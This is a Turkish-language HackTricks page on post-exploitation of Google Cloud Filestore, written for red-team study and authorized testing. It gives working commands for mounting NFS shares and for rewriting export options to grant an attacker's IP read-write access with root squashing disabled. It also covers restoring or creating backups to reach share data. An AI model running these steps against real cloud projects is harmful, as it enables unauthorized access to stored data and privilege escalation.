GCP - Filestore Post Exploitation

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Filestore

Filestore hakkında daha fazla bilgi için kontrol edin:

GCP - Filestore Enum

Filestore'u Bağlama

Paylaşılan bir dosya sistemi saldırganlar açısından ilginç hassas bilgiler içerebilir. Filestore'a erişim ile bağlamak mümkündür:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Bir filestore örneğinin IP adresini bulmak için sayfanın numaralandırma bölümüne bakın:

GCP - Filestore Enum

Kısıtlamaları Kaldırın ve Ek İzinler Alın

Eğer saldırgan paylaşıma erişimi olan bir IP adresinde değilse, ancak bunu değiştirmek için yeterli izniniz varsa, kısıtlamaları kaldırmak veya buna erişim sağlamak mümkündür. Ayrıca, paylaşıma admin erişimi sağlamak için IP adresinize daha fazla ayrıcalık vermek de mümkündür:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Restore a backup

Eğer bir yedekleme varsa, mevcut bir örnekte veya yeni bir örnekte geri yüklemek mümkündür, böylece bilgileri erişilebilir hale gelir:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Yedek oluşturun ve geri yükleyin

Eğer bir paylaşıma erişiminiz yoksa ve onu değiştirmek istemiyorsanız, onun yedekini oluşturmak ve daha önce bahsedildiği gibi geri yüklemek mümkündür:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 3 days ago